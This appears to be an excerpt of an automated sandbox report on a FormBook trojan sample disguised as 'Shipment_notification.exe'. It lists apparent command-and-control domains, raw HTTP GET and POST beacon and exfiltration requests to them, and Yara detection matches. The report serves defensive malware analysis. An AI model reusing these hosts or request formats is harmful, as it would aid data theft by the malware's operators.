          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kaj8tfjcmkn7.xyz/rs5b/Q
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.locationsbormes.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.locationsbormes.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.notebook-rucksack.com/rs5b/%
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peramid.xyz
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.peramid.xyz/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piergitarshoes.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piergitarshoes.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rubyidentity.space
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rubyidentity.space/rs5b/
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com.Y
          Source: Shipment_notification.exe, 00000000.00000003.313400358.00000000055AD000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000003.313431498.00000000055AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.comz
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: control.exe, 00000004.00000002.582622308.000000000551A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starauctioneerspro.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.starauctioneerspro.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcatelier.com
          Source: explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tcatelier.com/rs5b/
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ywtxsm.com/rs5b/Pr
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000000.00000002.351857642.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnv
          Source: Shipment_notification.exe, 00000000.00000003.316210305.0000000005579000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cnx
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zzxiaoyuan.com
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zzxiaoyuan.com/rs5b/
          Source: explorer.exe, 00000003.00000003.561960230.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.552948713.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.570252381.000000000884D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.573625286.000000000884B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.zzxiaoyuan.com/rs5b/1
          Source: 10W12dX.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 10W12dX.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 10W12dX.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 10W12dX.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: control.exe, 00000004.00000002.583265968.00000000073D0000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000004.00000002.582622308.000000000583E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
          Source: control.exe, 00000004.00000002.578430894.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, 10W12dX.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /rs5b/ HTTP/1.1Host: www.drkathleensanders.comConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.drkathleensanders.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.drkathleensanders.com/rs5b/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
          Source: unknownDNS traffic detected: queries for: www.emagrecarapido.store
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.isabellagambitta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.drkathleensanders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.carcosainvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.piergitarshoes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.ywtxsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.peramid.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1Host: www.locationsbormes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: Shipment_notification.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 0_2_00A7C844
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 0_2_00A7F1E8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 0_2_00A7F1F8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00403853
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0042202A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0042309D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004229D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00422200
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00421A3A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00401B30
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00422461
